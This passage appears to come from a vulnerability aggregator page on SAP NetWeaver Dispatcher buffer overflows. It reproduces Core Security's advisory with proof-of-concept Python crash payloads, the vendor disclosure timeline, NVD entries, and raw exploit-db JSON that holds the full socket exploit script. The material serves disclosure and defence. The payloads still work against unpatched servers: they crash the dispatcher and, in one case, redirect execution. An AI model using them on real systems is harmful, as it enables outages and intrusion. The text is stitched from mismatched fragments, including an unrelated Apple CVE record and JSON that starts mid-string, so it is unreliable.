
#[CVE-2012-2511]
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)

#[CVE-2012-2512]
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)

#[CVE-2012-2513]
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)

#[CVE-2012-2514]
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/

In the following subsections, we give the Python code that can be added after the script above in order to reproduce all vulnerabilities.

8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2012-2611] The vulnerability can be triggered when the SAP Netweaver disp+work.exe module processes a specially crafted network packet. Malicious packets are processed by the vulnerable function DiagTraceR3Info in the disp+work.exe module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following Python code can be used to trigger the vulnerability:

/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/

8.2. SAP Netweaver DiagTraceHex Denial Of Service Vulnerability
[CVE-2012-2612] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceHex in disp+work.exe. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following Python code can be used to trigger the vulnerability:

/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/

8.3. SAP Netweaver DiagTraceAtoms Denial Of Service Vulnerability
[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceAtoms. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following Python code can be used to trigger the vulnerability:

/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/

8.4. SAP Netweaver DiagTraceStreamI Denial Of Service Vulnerability
[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceStreamI and could allow a remote unauthenticated attacker to conduct a denial of service attack.

/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/

8.5. SAP Netweaver Diaginput Denial Of Service Vulnerability
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function Diaginput, allowing a denial of service attack against the vulnerable systems.

/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/

8.6. SAP Netweaver DiagiEventSource Denial Of Service Vulnerability
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function DiagiEventSource in the disp+work.exe module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.

/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/

9. Report Timeline
2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.
2012-01-24: Core sends an advisory draft with technical details.
2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.
2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.
2012-02-21: First release date missed.
2012-02-22: Core asks for the status of the fix and notifies that the release date was missed.
2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.
2012-02-23: Core re-schedules the advisory publication to May 8th.
2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.
2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.
2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).
2012-05-07: Core asks again for the status of the fix.
2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].
2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.
2012-05-08: Advisory CORE-2012-0123 published.
2012-05-10: ERRATA: CVE-2011-1516 changed to CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.

10. References
[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910

CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)


NVD CVE records

CVE-2012-2514 (published 2012-05-15; CWE-119; CVSS 2.0 base score 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P; affected: cpe:/a:sap:netweaver:7.0 EHP1 and EHP2)
The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2514

CVE-2012-2512 (published 2012-05-15; CWE-119; CVSS 2.0 base score 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P; affected: cpe:/a:sap:netweaver:7.0 EHP1 and EHP2)
The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2512

CVE-2011-1516 (published 2011-11-15; CWE-264; CVSS 2.0 base score 7.6, AV:N/AC:H/Au:N/C:C/I:C/A:C; affected: Apple Mac OS X 10.5.0 through 10.5.8, 10.6.0 through 10.6.8 and 10.7.0 through 10.7.2)
The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1516

CVE-2012-2513 (published 2012-05-15; CWE-119; CVSS 2.0 base score 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P; affected: cpe:/a:sap:netweaver:7.0 EHP1 and EHP2)
The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2513

SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function.
By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-05T23:15:00", "title": "CVE-2011-1517", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1517"], "modified": "2020-02-07T19:09:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2011-1517", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1517", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:06:04", "description": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", "edition": 3, "cvss3": {}, "published": "2012-05-15T04:21:00", "title": "CVE-2012-2511", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2511"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2012-2511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2511", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T10:34:00", "description": "SAP Netweaver Dispatcher Multiple Vulnerabilities. CVE-2011-1516,CVE-2012-2511,CVE-2012-2512,CVE-2012-2513,CVE-2012-2514,CVE-2012-2611,CVE-2012-2612. Dos exp...", "published": "2012-05-09T00:00:00", "type": "exploitdb", "title": "SAP Netweaver Dispatcher Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2012-2611", "CVE-2012-2514", "CVE-2012-2612", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-05-09T00:00:00", "id": "EDB-ID:18853", "href": "https://www.exploit-db.com/exploits/18853/", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nSAP Netweaver Dispatcher Multiple Vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-08\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. 
*Vulnerability Information*\r\n\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\r\nCVE-2012-2513, CVE-2012-2514\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSAP Netweaver [1] is a technology platform for building and integrating\r\nSAP business applications. Multiple vulnerabilities have been found in\r\nSAP Netweaver that could allow an unauthenticated, remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered sending specially crafted SAP Diag packets\r\nto remote TCP port 32NN (being NN the SAP system number) of a host\r\nrunning the \"Dispatcher\" service, part of SAP Netweaver Application\r\nServer ABAP. By sending different messages, the different\r\nvulnerabilities can be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\n . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Vendor did not provide this information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nSAP released the security note\r\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\r\nissues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of\r\nthe vulnerabilities:\r\n\r\n 1. Disable work processes' Developer Traces for the 'Dialog\r\nProcessing' component (for the vulnerabilities [CVE-2011-1516],\r\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).\r\n 2. Restrict access to the Dispatcher service's TCP ports (3200/3299)\r\n(for all vulnerabilities).\r\n 3. 
Restrict access to the work process management transactions\r\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\r\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\r\n[CVE-2012-2512]).\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Martin Gallo\r\nfrom\r\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services.\r\nThe publication of this advisory was coordinated by Fernando Miranda\r\nfrom http://www.coresecurity.com/content/corelabs-advisories .\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in\r\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\r\nand [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities\r\ndescribed below:\r\n\r\n/-----\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\r\ndefault=\"localhost\")\r\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\r\nnumber\", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n packet = struct.pack(\"!I\", len(packet)) + packet\r\n sock.send(packet)\r\n\r\ndef receive(sock):\r\n length = sock.recv(4)\r\n (length, ) = struct.unpack(\"!I\", length)\r\n data = \"\"\r\n while len(data)<length:\r\n data+= sock.recv(length)\r\n return (length, data)\r\n\r\ndef initialize(sock):\r\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n user_connect =\r\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\r\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\r\n support_data+=\r\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\r\n 
support_data+=\r\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n dpheader =\r\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\r\nsupport_data))\r\n dpheader+=\r\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\r\n dpheader+= \"terminalXXXXXXX\"\r\n dpheader+=\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \r\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\r\n eom = \"\\x0c\"\r\n send_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection) \r\n\r\n-----/\r\n In the following subsections, we give the python code that can be added\r\nafter the script above in order to reproduce all vulnerabilities.\r\n\r\n\r\n8.1. 
*SAP Netweaver DiagTraceR3Info Vulnerability*\r\n\r\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\r\n'disp+work.exe' module process a specially crafted network packet.\r\nMalicious packets are processed by the vulnerable function\r\n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace\r\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\r\nthe \"Dialog\" work process handling the packet [2]. This vulnerability\r\ncould allow a remote unauthenticated attacker to execute arbitrary code\r\nwith the privileges of the user running the \"Dispatcher\" service. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\r\n\r\n[CVE-2011-1517] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a\r\nremote unauthenticated attacker to conduct a denial of service attack\r\nagainst the vulnerable systems. The following python code can be used to\r\ntrigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceAtoms'. This vulnerability could allow a remote\r\nunauthenticated attacker to conduct a denial of service attack. 
The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to\r\nconduct a denial of service attack.\r\n\r\n/-----\r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\r\nfunction 'Diaginput', allowing a denial of service attack against the\r\nvulnerable systems.\r\n\r\n/-----\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\r\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\r\nvulnerability could allow a remote unauthenticated attacker to conduct a\r\ndenial of service attack.\r\n\r\n/-----\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2012-01-24:\r\nCore Security Technologies notifies the SAP team of the vulnerability,\r\nsetting the estimated publication date of the advisory for February\r\n21st, 2012.\r\n\r\n. 2012-01-24:\r\nCore sends an advisory draft with technical details.\r\n\r\n. 2012-01-24:\r\nThe SAP team confirms the reception of the issue and asks to use the\r\nsecurity ID 582820-2012 for further communication. SAP also notifies its\r\nterms and conditions [3], and asks for Core to commit to that guideline.\r\n\r\n. 
2012-02-01:\r\nThe Core Advisories Team communicates that it has its own guidelines for\r\nthe advisories publication process, which may conflict with SAP's\r\nguidelines. In particular, Core does not guarantee that the publication\r\nof the advisory will be postponed until a fix or patch is made available\r\nby SAP. If information about this vulnerability is partially or\r\ncompletely leaked by a third party, the advisory would be released\r\nimmediately as forced release. Despite this, the Core team commits to\r\ncomply with SAP's guidelines as much as possible.\r\n\r\n. 2012-02-21:\r\nFirst release date missed.\r\n\r\n. 2012-02-22:\r\nCore asks for the status of the fix and notifies that the release date\r\nwas missed.\r\n\r\n. 2012-02-23:\r\nSAP notifies that, because the development team has to downport the\r\nsolutions for a huge bunch of software releases, the earliest release\r\ndate for the patches would be May 8th 2012.\r\n\r\n. 2012-02-23:\r\nCore re-schedules the advisory publication to May 8th.\r\n\r\n. 2012-04-16:\r\nCore asks if the patching process is still on track to release patches\r\non May 8th and requests a status of the fix.\r\n\r\n. 2012-04-16:\r\nVendor notifies that the release date is still planned for May 8th, but\r\ndue to quality control processes this date cannot be guaranteed.\r\n\r\n. 2012-05-04:\r\nCore notifies that everything is ready for publication and requests the\r\nvendor to confirm the release date and the list of affected platforms\r\n(no reply received).\r\n\r\n. 2012-05-07:\r\nCore asks again for the status of the fix.\r\n\r\n. 2012-05-08:\r\nSAP notifies that they have released the security note 1687910 [4] on\r\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\r\nalso requests Core to remove all the technical information researched by\r\nMartin Gallo in [Sec. 8].\r\n\r\n. 
2012-05-08:\r\nCore replies that the reporting of vulnerabilities is aimed at helping\r\nvulnerable users to understand and address the issues; the advisory will\r\nthus be released with the technical information.\r\n\r\n. 2012-05-08:\r\nAdvisory CORE-2012-0123 published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2]\r\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions\r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\r\n\r\n[4] SAP security note 1687910\r\nhttps://service.sap.com/sap/support/notes/1687910.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. 
Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2012 Core Security\r\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18853/"}, {"lastseen": "2016-02-02T14:49:48", "description": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities. CVE-2012-2511,CVE-2012-2512,CVE-2012-2513,CVE-2012-2514,CVE-2012-2611,CVE-2012-2612. Dos expl...", "published": "2012-08-21T00:00:00", "type": "exploitdb", "title": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2611", "CVE-2012-2514", "CVE-2012-2612", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-08-21T00:00:00", "id": "EDB-ID:20705", "href": "https://www.exploit-db.com/exploits/20705/", "sourceData": "1. 
Advisory Information\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-10\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n2. Vulnerability Information\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514\r\n\r\n3. Vulnerability Description\r\nSAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the \"Dispatcher\" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.\r\n\r\n4. Vulnerable packages\r\nSAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\nSAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\nOlder versions are probably affected too, but they were not checked.\r\n5. Non-vulnerable packages\r\nVendor did not provide this information.\r\n6. Vendor Information, Solutions and Workarounds\r\nSAP released the security note 1687910 regarding these issues. 
Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:\r\n\r\nDisable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\nRestrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).\r\nRestrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n7. Credits\r\nThese vulnerabilities were discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Security Advisories Team .\r\n\r\n8. Technical Description / Proof of Concept Code\r\nNOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities described below:\r\n\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\", default=\"localhost\")\r\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port number\", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n\tpacket = struct.pack(\"!I\", len(packet)) + packet\r\n\tsock.send(packet)\r\n\r\ndef receive(sock):\r\n\tlength = sock.recv(4)\r\n\t(length, ) = struct.unpack(\"!I\", length)\r\n\tdata = \"\"\r\n\twhile len(data)<length:\r\n\t\tdata+= sock.recv(length)\r\n\treturn (length, data)\r\n\r\ndef initialize(sock):\r\n\tdiagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tuser_connect = 
